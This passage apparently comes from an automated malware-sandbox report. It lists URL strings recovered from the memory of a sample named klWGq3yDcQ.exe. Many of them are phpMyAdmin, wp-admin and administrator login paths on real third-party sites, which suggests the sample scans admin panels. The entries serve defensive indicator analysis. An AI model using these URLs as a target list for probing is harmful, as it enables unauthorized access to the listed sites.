Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://himontessori.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hmichaelandco.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i0.wp.com/gasp-ga.com/wp-content/uploads/2018/05/cropped-favicon-1.jpg?fit=180%2C180&#038;ss
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i0.wp.com/gasp-ga.com/wp-content/uploads/2018/05/cropped-favicon-1.jpg?fit=192%2C192&#038;ss
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i0.wp.com/gasp-ga.com/wp-content/uploads/2018/05/cropped-favicon-1.jpg?fit=270%2C270&#038;ss
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i0.wp.com/gasp-ga.com/wp-content/uploads/2018/05/cropped-favicon-1.jpg?fit=32%2C32&#038;ssl=
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i0.wp.com/micro-design.com/wp-content/uploads/2023/08/appIcon.png?fit=180%2C180
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i0.wp.com/micro-design.com/wp-content/uploads/2023/08/appIcon.png?fit=192%2C192
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i0.wp.com/micro-design.com/wp-content/uploads/2023/08/appIcon.png?fit=32%2C32
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.0000000004122000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://image.jimcdn.com/app/cms/image/transf/dimension=175x10000:format=png/path/s5310617dc1962275/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.0000000004122000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://image.jimcdn.com/app/cms/image/transf/dimension=320x10000:format=png/path/s5310617dc1962275/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.0000000004122000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://image.jimcdn.com/app/cms/image/transf/dimension=350x10000:format=png/path/s5310617dc1962275/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886296265.00000000040E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images.cws.digital/fornecedores/m/rech.jpg
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img1.wsimg.com/parking-lander/static/css/main.ba077a97.css
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img1.wsimg.com/parking-lander/static/js/main.ed307b3c.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2886296265.00000000040E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://institucional.rech.com/lojas/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000003FFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://j-president.net/aichi/daisyokogyo/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.000000000436A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jamiesonmullin.com
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.000000000436A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jamiesonmullin.com#identity
Source: klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887067492.000000000436A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jamiesonmullin.com//assets/dist/main.cd86828fbd0190c4211a.css
Source: klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887067492.000000000436A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jamiesonmullin.com/assets/uploads/Logo.png
Source: klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887067492.000000000436A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jamiesonmullin.com/assets/uploads/_1200x630_fit_center-center_82_none/ogimage.jpg?mtime=1605
Source: klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887067492.000000000436A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jamiesonmullin.com/assets/uploads/_600x60_fit_center-center_82_none/Logo.png?mtime=160565081
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://knu.ac.in/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://knu.ac.in/phpmyadmin/6
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://knu.ac.in/phpmyadmin/u3
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://knu.ac.in/phpmyadmin/x
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://krkconcord.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://krkconcord.com/phpmyadmin/:
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lgs-strategies.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lgs-strategies.com/phpmyadmin/jv
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/Me.htm?v=3
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/forgetme.srf?iframed_by=https%3a%2f%2flogin.microsoftonline.com
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/logout.srf?iframed_by=https%3a%2f%2flogin.microsoftonline.com
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?scope=openid
Source: klWGq3yDcQ.exe, 00000001.00000002.2868964891.0000000002A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/c8f4395e-fa4e-4196-adb9-ba2cd2ca09f0/saml2?SAMLRequest=fZJLj9sgFIX
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/jsdisabled
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lumaruniformes.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwindowelive.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwindowelive.com/phpmyadmin/dmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lx13.hoststar.hosting
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://macisis.co.uk/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://macisis.co.uk/phpmyadmin/A
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://micro-design.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://micro-design.com/phpmyadmin/4f
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043B0000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://midcapfunding.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://midcapfunding.com/phpmyadmin/Admin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://my.calvary.qld.edu.au/login/?page=%2Fpma%2F
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://my.calvary.qld.edu.au/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://my.calvary.qld.edu.au/phpmyadmin/5
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://my.calvary.qld.edu.au/saml/index.php?page=%2Fwp-admin%2F
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nohonetworks.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nohonetworks.com/phpmyadmin/K
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.000000000400D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nwzimg.wezhan.net/static-js/page404.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://octetpowers.in/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2877970062.00000000036E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ogp.-
Source: klWGq3yDcQ.exe, 00000001.00000002.2877970062.00000000036E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ogp.-/hZ
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004067000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ondania.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004067000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ondania.com/phpmyadmin/O
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paintd.plus.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paintd.plus.com/phpmyadmin/J
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parking-crew.com/track.
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C8000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000003.2251172424.000000004E5EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com/api/player.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C8000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000003.2251172424.000000004E5EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com/video/783205887?h=2af45961b5&amp;badge=0&amp;autopause=0&amp;player_id=0&am
Source: klWGq3yDcQ.exe, 00000001.00000002.2886296265.00000000040E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plus.google.com/115113864863866027522
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://polyone.my.salesforce.com
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://polyone.my.salesforce.com/embeddedservice/5.0/esw.min.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://polyone.secure.force.com/Feedbackpagetocustomer
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://privatemoe.ae/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://px.ads.linkedin.com/collect/?pid=2466708&fmt=gif
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rdelealtad.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rdelealtad.com/phpmyadmin/W
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rech.com
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rechagricola.com.br/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rochester-gauges.be/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000003.1729833880.0000000002A57000.00000004.00000020.00020000.00000000.sdmp, unverified-microdesc-consensus.tmp.1.drString found in binary or memory: https://sabotage.net
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samson.pe/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samson.pe/#/schema/logo/image/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samson.pe/#organization
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samson.pe/#website
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samson.pe/?s=
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samson.pe/comments/feed/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samson.pe/feed/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samson.pe/wp-content/uploads/2022/06/logo-samson.png
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://schema.org
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://schema.org/BreadcrumbList
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://schema.org/ListItem
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004300000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2888110543.0000000004A1D000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://service.force.com
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://service.force.com/embeddedservice/5.0/esw.min.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://snap.licdn.com/li.lms-analytics/insight.min.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sofia-communications.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CE9000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stats.wp.com/e-202347.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://student.debritto.sch.id/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://student.debritto.sch.id/phpmyadmin/z
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://student.ub.ac.id/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://students.kasralainy.edu.eg/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://students.kasralainy.edu.eg/phpmyadmin/n-A
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t1eng.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/administrator/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/administrator/outlook.com:220
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/comments/feed/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/feed/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-admin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-admin/hp
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-admin/hpdmin/Y
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.6.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-20
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.6.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.3.1.5
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?v
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/plugins/slider-captcha/css/slider-captcha.css?ver=0.4.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/plugins/slider-captcha/js/jquery.ui.touch-punch-improved.js?ver=0.4
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/plugins/slider-captcha/js/slider-captcha.min.js?ver=1.4.3
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/themes/bizone/assets/css/animate.min.css?ver=5.1.8
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/themes/bizone/assets/css/bootstrap.min.css?ver=5.1.8
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/themes/bizone/assets/css/custom.css?ver=5.1.8
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/themes/bizone/assets/css/icomoon-fonts.css?ver=5.1.8
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/themes/bizone/assets/css/jPushMenu.css?ver=5.1.8
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/themes/bizone/assets/css/jquery.fancybox.css?ver=5.1.8
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/themes/bizone/assets/css/loader.css?ver=5.1.8
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/themes/bizone/assets/css/onepage.css?ver=5.1.8
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/themes/bizone/assets/css/owl.carousel.css?ver=5.1.8
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/themes/bizone/assets/css/settings.css?ver=5.1.8
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/themes/bizone/assets/css/zerogrid.css?ver=5.1.8
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talentius.com/wp-content/themes/bizone/assets/js/bootstrap.min.js
